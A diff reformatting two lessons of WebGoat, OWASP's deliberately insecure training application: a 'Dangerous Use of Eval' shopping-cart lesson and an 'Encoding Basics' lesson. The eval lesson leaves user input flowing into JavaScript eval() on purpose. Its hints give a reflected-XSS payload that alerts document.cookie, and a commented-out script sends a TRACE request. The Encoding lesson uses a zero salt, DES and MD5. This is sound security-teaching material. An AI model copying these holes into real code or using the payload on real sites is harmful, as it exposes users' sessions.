-		    tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™"));
-		    tr.addElement(new TD().addElement("1599.99").setAlign("right"));
-		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", "1"))).setAlign("right"));
-		    quantity = s.getParser().getFloatParameter("QTY3", 0.0f);
-		    total = quantity * 1599.99f;
-		    runningTotal += total;
-		    tr.addElement(new TD().addElement("$" + total));
-		    t.addElement(tr);
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
-		    tr.addElement(new TD().addElement("299.99").setAlign("right"));
-	
-		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", "1"))).setAlign("right"));
-		    quantity = s.getParser().getFloatParameter("QTY4", 0.0f);
-		    total = quantity * 299.99f;
-		    runningTotal += total;
-		    tr.addElement(new TD().addElement("$" + total));
-		    t.addElement(tr);
-	
-		    ec.addElement(t);
-	
-		    t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-	
-		    if (s.isColor())
-		    {
-		    	t.setBorder(1);
-		    }
-	
-		    ec.addElement(new BR());
-	
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("The total charged to your credit card:"));
-		    tr.addElement(new TD().addElement("$" + runningTotal));
-		    
-		    
-		    Input b = new Input();
-		    b.setType(Input.BUTTON);
-		    b.setValue("Update Cart");
-		    b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
-		    
-		    
-		    
-		    tr.addElement(new TD().addElement(b));
-		    t.addElement(tr);
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-		    t.addElement(tr);
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Enter your credit card number:"));
-		    tr.addElement(new TD().addElement("<input id='field2' name='field2' type='TEXT' value='4128 3214 0002 1999'>"));
-		    t.addElement(tr);
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Enter your three digit access code:"));
-		    tr.addElement(new TD().addElement("<input id='field1' name='field1' type='TEXT' value='123'>"));
-		    //tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1)));
-		    t.addElement(tr);
-	
-		    b = new Input();
-		    b.setType(Input.BUTTON);
-		    b.setValue("Purchase");
-		    b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
-		    
-		    tr = new TR();
-		    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
-		    t.addElement(tr);
-		    
-		    ec.addElement(t);
-		    ec.addElement(new BR());
-		    ec.addElement(new HR().setWidth("90%"));
-		}
-		catch (Exception e)
+			// String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214
+			// 0002 1999"));
+			float quantity = 1.0f;
+			float total = 0.0f;
+			float runningTotal = 0.0f;
+
+			// FIXME: encode output of field2, then s.setMessage( field2 );
+			ec.addElement("<script src=\"javascript/eval.js\"/>");
+			ec.addElement(new HR().setWidth("90%"));
+			ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			TR tr = new TR();
+			tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
+			tr.addElement(new TH().addElement("Price").setWidth("10%"));
+			tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+			tr.addElement(new TH().addElement("Total").setWidth("7%"));
+			t.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry "));
+			tr.addElement(new TD().addElement("69.99").setAlign("right"));
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY1", 0.0f);
+			total = quantity * 69.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case"));
+			tr.addElement(new TD().addElement("27.99").setAlign("right"));
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY2", 0.0f);
+			total = quantity * 27.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™"));
+			tr.addElement(new TD().addElement("1599.99").setAlign("right"));
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY3", 0.0f);
+			total = quantity * 1599.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over "));
+			tr.addElement(new TD().addElement("299.99").setAlign("right"));
+
+			tr.addElement(new TD().addElement(
+												new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4",
+																												"1")))
+					.setAlign("right"));
+			quantity = s.getParser().getFloatParameter("QTY4", 0.0f);
+			total = quantity * 299.99f;
+			runningTotal += total;
+			tr.addElement(new TD().addElement("$" + total));
+			t.addElement(tr);
+
+			ec.addElement(t);
+
+			t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+
+			ec.addElement(new BR());
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("The total charged to your credit card:"));
+			tr.addElement(new TD().addElement("$" + runningTotal));
+
+			Input b = new Input();
+			b.setType(Input.BUTTON);
+			b.setValue("Update Cart");
+			b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
+
+			tr.addElement(new TD().addElement(b));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Enter your credit card number:"));
+			tr.addElement(new TD()
+					.addElement("<input id='field2' name='field2' type='TEXT' value='4128 3214 0002 1999'>"));
+			t.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("Enter your three digit access code:"));
+			tr.addElement(new TD().addElement("<input id='field1' name='field1' type='TEXT' value='123'>"));
+			// tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1",param1)));
+			t.addElement(tr);
+
+			b = new Input();
+			b.setType(Input.BUTTON);
+			b.setValue("Purchase");
+			b.addAttribute("onclick", "purchase('lessons/Ajax/eval.jsp');");
+
+			tr = new TR();
+			tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
+			t.addElement(tr);
+
+			ec.addElement(t);
+			ec.addElement(new BR());
+			ec.addElement(new HR().setWidth("90%"));
+		} catch (Exception e)
 		{
-		    s.setMessage("Error generating " + this.getClass().getName());
-		    e.printStackTrace();
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
 		return (ec);
-    }
+	}
 
+	/**
+	 * DOCUMENT ME!
+	 * 
+	 * @return DOCUMENT ME!
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.AJAX_SECURITY;
+	}
 
-    /**
-     *  DOCUMENT ME!
-     *
-     * @return    DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()
-    {
-    	return Category.AJAX_SECURITY;
-    }
-
-
-    /**
-     *  Gets the hints attribute of the AccessControlScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
+	/**
+	 * Gets the hints attribute of the AccessControlScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
 		List<String> hints = new ArrayList<String>();
 		hints.add("The lesson is similar to the standard reflected cross-site scripting lesson.");
 		hints.add("The access code parameter is vulnerable to a reflected cross-site scripting problem.");
 		hints.add("The usual &lt;SCRIPT&gt;alert(document.cookie);&lt;/SCRIPT&gt; will not work in this lesson. Why?");
-		hints.add("User-supplied data is landing in the Javascript eval() function. Your attack will not require the &lt; and &gt; characters.");
+		hints
+				.add("User-supplied data is landing in the Javascript eval() function. Your attack will not require the &lt; and &gt; characters.");
 		hints.add("In order to pass this lesson, you must 'alert' the document.cookie.");
 		hints.add("Try 123');alert(document.cookie);('");
 		return hints;
-    }
+	}
 
-
-    //	<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
-    /**
-     *  Gets the instructions attribute of the WeakAccessControl object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
+	// <script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp
+	// = new
+	// ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false);
+	// xmlHttp.send();str1=xmlHttp.responseText;document.write(str1);}</script>
+	/**
+	 * Gets the instructions attribute of the WeakAccessControl object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
 		String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script. In order to pass this lesson, you must 'alert()' document.cookie.";
 		return (instructions);
-    }
+	}
 
-    private final static Integer DEFAULT_RANKING = new Integer(120);
+	private final static Integer DEFAULT_RANKING = new Integer(120);
 
-    protected Integer getDefaultRanking()
-    {
-    	return DEFAULT_RANKING;
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
+	/**
+	 * Gets the title attribute of the AccessControlScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "Dangerous Use of Eval";
+	}
 
-    /**
-     *  Gets the title attribute of the AccessControlScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-    	return "Dangerous Use of Eval";
-    }
-    
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("", ASPECT_LOGO);
-    }
-    
-    /**
-     * Check to see if JSP says they passed the lesson.
-     * @param s
-     */
-    private void checkSuccess(WebSession s)
-    {
-    	javax.servlet.http.HttpSession session = s.getRequest().getSession();
-		
-    	if(session.getAttribute(PASSED) != null)
+	public Element getCredits()
+	{
+		return super.getCustomCredits("", ASPECT_LOGO);
+	}
+
+	/**
+	 * Check to see if JSP says they passed the lesson.
+	 * 
+	 * @param s
+	 */
+	private void checkSuccess(WebSession s)
+	{
+		javax.servlet.http.HttpSession session = s.getRequest().getSession();
+
+		if (session.getAttribute(PASSED) != null)
 		{
 			makeSuccess(s);
-			
+
 			session.removeAttribute(PASSED);
 		}
-    }
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java
index 8b9d98411..887dfa0eb 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.IOException;
@@ -12,12 +13,10 @@ import java.security.MessageDigest;
 import java.security.NoSuchAlgorithmException;
 import java.util.ArrayList;
 import java.util.List;
-
 import javax.crypto.Cipher;
 import javax.crypto.SecretKey;
 import javax.crypto.SecretKeyFactory;
 import javax.crypto.spec.PBEParameterSpec;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -33,43 +32,44 @@ import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
 
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 
 public class Encoding extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
+
 	private final static String INPUT = "input";
 
 	private final static String KEY = "key";
@@ -82,103 +82,96 @@ public class Encoding extends LessonAdapter
 
 	// encryption constant
 
-	private static byte[] salt =
-			{
-			(byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00,
-			(byte) 0x00
-			};
-
-
+	private static byte[] salt = { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00,
+			(byte) 0x00, (byte) 0x00 };
 
 	/**
-	 *  Returns the base 64 decoding of a string.
-	 *
-	 * @param  str              Description of the Parameter
-	 * @return                  Description of the Return Value
-	 * @exception  IOException  Description of the Exception
+	 * Returns the base 64 decoding of a string.
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception IOException
+	 *                Description of the Exception
 	 */
 
-	public static String base64Decode( String str ) throws IOException
+	public static String base64Decode(String str) throws IOException
 	{
 
-		byte[] b = decoder.decodeBuffer( str );
+		byte[] b = decoder.decodeBuffer(str);
 
-		return ( new String( b ) );
+		return (new String(b));
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  c                Description of the Parameter
-	 * @return                  Description of the Return Value
-	 * @exception  IOException  Description of the Exception
+	 * Description of the Method
+	 * 
+	 * @param c
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 * @exception IOException
+	 *                Description of the Exception
 	 */
 
-	public static String base64Decode( char[] c ) throws IOException
+	public static String base64Decode(char[] c) throws IOException
 	{
 
-		return base64Decode( new String( c ) );
+		return base64Decode(new String(c));
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  c  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param c
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String base64Encode( char[] c )
+	public static String base64Encode(char[] c)
 	{
 
-		return base64Encode( new String( c ) );
+		return base64Encode(new String(c));
 	}
 
-
-
 	/**
-	 *  Returns the base 64 encoding of a string.
-	 *
-	 * @param  str  Description of the Parameter
-	 * @return      Description of the Return Value
+	 * Returns the base 64 encoding of a string.
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String base64Encode( String str )
+	public static String base64Encode(String str)
 	{
 
 		byte[] b = str.getBytes();
 
-		return ( encoder.encode( b ) );
+		return (encoder.encode(b));
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  b  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param b
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String base64Encode( byte[] b )
+	public static String base64Encode(byte[] b)
 	{
 
-		return ( encoder.encode( b ) );
+		return (encoder.encode(b));
 	}
 
-
-
 	/**
-	 *  Description of the Method
-	 *
-	 * @param  s  Description of the Parameter
-	 * @return    Description of the Return Value
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	protected Element createContent( WebSession s )
+	protected Element createContent(WebSession s)
 	{
 
 		ElementContainer ec = new ElementContainer();
@@ -186,221 +179,220 @@ public class Encoding extends LessonAdapter
 		try
 		{
 
-			String userInput = s.getParser().getRawParameter( INPUT, "" );
+			String userInput = s.getParser().getRawParameter(INPUT, "");
 
-			String userKey = s.getParser().getStringParameter( KEY, "" );
+			String userKey = s.getParser().getStringParameter(KEY, "");
 
 			Table table = new Table();
 
 			TR tr = new TR();
 
-			tr.addElement( new TD( "Enter a string: " ) );
+			tr.addElement(new TD("Enter a string: "));
 
-			Input input = new Input( Input.TEXT, INPUT, userInput );
+			Input input = new Input(Input.TEXT, INPUT, userInput);
 
-			tr.addElement( new TD().addElement( input ) );
+			tr.addElement(new TD().addElement(input));
 
-			table.addElement( tr );
+			table.addElement(tr);
 
 			tr = new TR();
 
-			tr.addElement( new TD( "Enter a password (optional): " ) );
+			tr.addElement(new TD("Enter a password (optional): "));
 
-			Input key = new Input( Input.TEXT, KEY, userKey );
+			Input key = new Input(Input.TEXT, KEY, userKey);
 
-			tr.addElement( new TD().addElement( key ) );
+			tr.addElement(new TD().addElement(key));
 
-			table.addElement( tr );
+			table.addElement(tr);
 
 			tr = new TR();
 
-			Element b = ECSFactory.makeButton( "Go!" );
+			Element b = ECSFactory.makeButton("Go!");
 
-			tr.addElement( new TD().setAlign( "center" ).setColSpan( 2 ).addElement( b ) );
+			tr.addElement(new TD().setAlign("center").setColSpan(2).addElement(b));
 
-			table.addElement( tr );
+			table.addElement(tr);
 
-			ec.addElement( table );
+			ec.addElement(table);
 
-			ec.addElement( new P() );
+			ec.addElement(new P());
 
 			Table t = new Table();
 
-			t.setWidth( "100%" );
+			t.setWidth("100%");
 
-			t.setBorder( 0 );
+			t.setBorder(0);
 
-			t.setCellSpacing( 1 );
+			t.setCellSpacing(1);
 
-			t.setCellPadding( 4 );
+			t.setCellPadding(4);
 
 			String description;
 
-			t.addElement( makeTitleRow( "Description", "Encoded", "Decoded" ) );
+			t.addElement(makeTitleRow("Description", "Encoded", "Decoded"));
 
 			description = "Base64 encoding is a simple reversable encoding used to encode bytes into ASCII characters. Useful for making bytes into a printable string, but provides no security.";
 
-//			t.addElement( makeDescriptionRow( description ) );
-			t.addElement( makeRow( description, base64Encode( userInput ), base64Decode( userInput ) ) );
-//			t.addElement( makeSpacerRow() );
+			// t.addElement( makeDescriptionRow( description ) );
+			t.addElement(makeRow(description, base64Encode(userInput), base64Decode(userInput)));
+			// t.addElement( makeSpacerRow() );
 
 			description = "Entity encoding uses special sequences like &amp;amp; for special characters. This prevents these characters from being interpreted by most interpreters.";
 
-			t.addElement( makeRow( description, HtmlEncoder.encode( userInput ), HtmlEncoder.decode( userInput ) ) );
+			t.addElement(makeRow(description, HtmlEncoder.encode(userInput), HtmlEncoder.decode(userInput)));
 
 			description = "Password based encryption (PBE) is strong encryption with a text password. Cannot be decrypted without the password";
 
-			t.addElement( makeRow( description, encryptString( userInput, userKey ), decryptString( userInput, userKey ) ) );
+			t.addElement(makeRow(description, encryptString(userInput, userKey), decryptString(userInput, userKey)));
 			description = "MD5 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes. For obscure cryptographic reasons, it is better to use SHA-256 if you have a choice.";
 
-			t.addElement( makeRow( description, hashMD5( userInput ), "Cannot reverse a hash" ) );
-			
+			t.addElement(makeRow(description, hashMD5(userInput), "Cannot reverse a hash"));
+
 			description = "SHA-256 hash is a checksum that can be used to validate a string or byte array, but cannot be reversed to find the original string or bytes.";
 
-			t.addElement( makeRow( description, hashSHA( userInput ), "N/A" ) );
-			
+			t.addElement(makeRow(description, hashSHA(userInput), "N/A"));
+
 			description = "Unicode encoding is...";
 
-			t.addElement( makeRow( description, "Not Implemented", "Not Implemented" ) );
-			
+			t.addElement(makeRow(description, "Not Implemented", "Not Implemented"));
+
 			description = "URL encoding is...";
 
-			t.addElement( makeRow( description, urlEncode( userInput ), urlDecode( userInput ) ) );
-			
+			t.addElement(makeRow(description, urlEncode(userInput), urlDecode(userInput)));
+
 			description = "Hex encoding simply encodes bytes into %xx format.";
 
-			t.addElement( makeRow( description, hexEncode( userInput ), hexDecode( userInput ) ) );
-			
+			t.addElement(makeRow(description, hexEncode(userInput), hexDecode(userInput)));
+
 			description = "Rot13 encoding is a way to make text unreadable, but is easily reversed and provides no security.";
 
-			t.addElement( makeRow( description, rot13( userInput ), rot13( userInput ) ) );
-			
+			t.addElement(makeRow(description, rot13(userInput), rot13(userInput)));
+
 			description = "XOR with password encoding is a weak encryption scheme that mixes a password into data.";
 
-			t.addElement( makeRow( description, xorEncode( userInput, userKey ), xorDecode( userInput, userKey ) ) );
-			
+			t.addElement(makeRow(description, xorEncode(userInput, userKey), xorDecode(userInput, userKey)));
+
 			description = "Double unicode encoding is...";
 
-			t.addElement( makeRow( description, "Not Implemented", "Not Implemented" ) );
-			
+			t.addElement(makeRow(description, "Not Implemented", "Not Implemented"));
+
 			description = "Double URL encoding is...";
 
-			t.addElement( makeRow( description, urlEncode( urlEncode( userInput ) ), urlDecode( urlDecode( userInput ) ) ) );
-			
-			ec.addElement( t );
+			t.addElement(makeRow(description, urlEncode(urlEncode(userInput)), urlDecode(urlDecode(userInput))));
+
+			ec.addElement(t);
 
 		}
 
-		catch ( Exception e )
+		catch (Exception e)
 		{
 
-			s.setMessage( "Error generating " + this.getClass().getName() );
+			s.setMessage("Error generating " + this.getClass().getName());
 
 			e.printStackTrace();
 
 		}
 
-		if ( getLessonTracker(  s ).getNumVisits() > 3 )
+		if (getLessonTracker(s).getNumVisits() > 3)
 		{
-			makeSuccess( s );
+			makeSuccess(s);
 		}
 
-		return ( ec );
+		return (ec);
 	}
 
-
-
 	/**
-	 *  Convenience method for encrypting a string.
-	 *
-	 * @param  str  Description of the Parameter
-	 * @param  pw   Description of the Parameter
-	 * @return      String the encrypted string.
+	 * Convenience method for encrypting a string.
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @param pw
+	 *            Description of the Parameter
+	 * @return String the encrypted string.
 	 */
 
-	public static synchronized String decryptString( String str, String pw )
+	public static synchronized String decryptString(String str, String pw)
 	{
 
 		try
 		{
 
-			PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec( salt, 20 );
+			PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20);
 
-			SecretKeyFactory kf = SecretKeyFactory.getInstance( "PBEWithMD5AndDES" );
+			SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
 
-			Cipher passwordDecryptCipher = Cipher.getInstance( "PBEWithMD5AndDES/CBC/PKCS5Padding" );
+			Cipher passwordDecryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding");
 
 			char[] pass = pw.toCharArray();
 
-			SecretKey k = kf.generateSecret( new javax.crypto.spec.PBEKeySpec( pass ) );
+			SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass));
 
-			passwordDecryptCipher.init( Cipher.DECRYPT_MODE, k, ps );
+			passwordDecryptCipher.init(Cipher.DECRYPT_MODE, k, ps);
 
-			byte[] dec = decoder.decodeBuffer( str );
+			byte[] dec = decoder.decodeBuffer(str);
 
-			byte[] utf8 = passwordDecryptCipher.doFinal( dec );
+			byte[] utf8 = passwordDecryptCipher.doFinal(dec);
 
-			return new String( utf8, "UTF-8" );
+			return new String(utf8, "UTF-8");
 		}
 
-		catch ( Exception e )
+		catch (Exception e)
 		{
 
-			return ( "This is not an encrypted string" );
+			return ("This is not an encrypted string");
 		}
 
 	}
 
-
-
 	/**
-	 *  Convenience method for encrypting a string.
-	 *
-	 * @param  str                    Description of the Parameter
-	 * @param  pw                     Description of the Parameter
-	 * @return                        String the encrypted string.
-	 * @exception  SecurityException  Description of the Exception
+	 * Convenience method for encrypting a string.
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @param pw
+	 *            Description of the Parameter
+	 * @return String the encrypted string.
+	 * @exception SecurityException
+	 *                Description of the Exception
 	 */
 
-	public static synchronized String encryptString( String str, String pw ) throws SecurityException
+	public static synchronized String encryptString(String str, String pw) throws SecurityException
 	{
 
 		try
 		{
 
-			PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec( salt, 20 );
+			PBEParameterSpec ps = new javax.crypto.spec.PBEParameterSpec(salt, 20);
 
-			SecretKeyFactory kf = SecretKeyFactory.getInstance( "PBEWithMD5AndDES" );
+			SecretKeyFactory kf = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
 
-			Cipher passwordEncryptCipher = Cipher.getInstance( "PBEWithMD5AndDES/CBC/PKCS5Padding" );
+			Cipher passwordEncryptCipher = Cipher.getInstance("PBEWithMD5AndDES/CBC/PKCS5Padding");
 
 			char[] pass = pw.toCharArray();
 
-			SecretKey k = kf.generateSecret( new javax.crypto.spec.PBEKeySpec( pass ) );
+			SecretKey k = kf.generateSecret(new javax.crypto.spec.PBEKeySpec(pass));
 
-			passwordEncryptCipher.init( Cipher.ENCRYPT_MODE, k, ps );
+			passwordEncryptCipher.init(Cipher.ENCRYPT_MODE, k, ps);
 
-			byte[] utf8 = str.getBytes( "UTF-8" );
+			byte[] utf8 = str.getBytes("UTF-8");
 
-			byte[] enc = passwordEncryptCipher.doFinal( utf8 );
+			byte[] enc = passwordEncryptCipher.doFinal(utf8);
 
-			return encoder.encode( enc );
+			return encoder.encode(enc);
 		}
 
-		catch ( Exception e )
+		catch (Exception e)
 		{
 
-			return ( "Encryption error" );
+			return ("Encryption error");
 		}
 
 	}
 
-
-
 	/**
-	 *  Gets the category attribute of the Encoding object
-	 *
-	 * @return    The category value
+	 * Gets the category attribute of the Encoding object
+	 * 
+	 * @return The category value
 	 */
 
 	protected Category getDefaultCategory()
@@ -408,29 +400,26 @@ public class Encoding extends LessonAdapter
 		return Category.INSECURE_STORAGE;
 	}
 
-
 	/**
-	 *  Gets the hints attribute of the HelloScreen object
-	 *
-	 * @return    The hints value
+	 * Gets the hints attribute of the HelloScreen object
+	 * 
+	 * @return The hints value
 	 */
 
 	public List<String> getHints(WebSession s)
 	{
 
 		List<String> hints = new ArrayList<String>();
-		hints.add( "Enter a string and press 'go'" );
-		hints.add( "Enter 'abc' and notice the rot13 encoding is 'nop' ( increase each letter by 13 characters )." );
-		hints.add( "Enter 'a c' and notice the url encoding is 'a+c' ( ' ' is converted to '+' )." );
+		hints.add("Enter a string and press 'go'");
+		hints.add("Enter 'abc' and notice the rot13 encoding is 'nop' ( increase each letter by 13 characters ).");
+		hints.add("Enter 'a c' and notice the url encoding is 'a+c' ( ' ' is converted to '+' ).");
 		return hints;
 	}
 
-
-
 	/**
-	 *  Gets the instructions attribute of the Encoding object
-	 *
-	 * @return    The instructions value
+	 * Gets the instructions attribute of the Encoding object
+	 * 
+	 * @return The instructions value
 	 */
 
 	public String getInstructions(WebSession s)
@@ -438,10 +427,6 @@ public class Encoding extends LessonAdapter
 		return "This lesson will familiarize the user with different encoding schemes.  ";
 	}
 
-
-
-
-
 	private final static Integer DEFAULT_RANKING = new Integer(15);
 
 	protected Integer getDefaultRanking()
@@ -450,26 +435,25 @@ public class Encoding extends LessonAdapter
 	}
 
 	/**
-	 *  Gets the title attribute of the HelloScreen object
-	 *
-	 * @return    The title value
+	 * Gets the title attribute of the HelloScreen object
+	 * 
+	 * @return The title value
 	 */
 
 	public String getTitle()
 	{
-		return ( "Encoding Basics" );
+		return ("Encoding Basics");
 	}
 
-
-
 	/**
-	 *  Returns the MD5 hash of a String.
-	 *
-	 * @param  str  Description of the Parameter
-	 * @return      Description of the Return Value
+	 * Returns the MD5 hash of a String.
+	 * 
+	 * @param str
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
 	 */
 
-	public static String hashMD5( String str )
+	public static String hashMD5(String str)
 	{
 
 		byte[] b = str.getBytes();
@@ -477,340 +461,325 @@ public class Encoding extends LessonAdapter
 
 		try
 		{
-			md = MessageDigest.getInstance( "MD5" );
-			md.update( b );
-		}
-		catch ( NoSuchAlgorithmException e )
+			md = MessageDigest.getInstance("MD5");
+			md.update(b);
+		} catch (NoSuchAlgorithmException e)
 		{
 			// it's got to be there
 			e.printStackTrace();
 		}
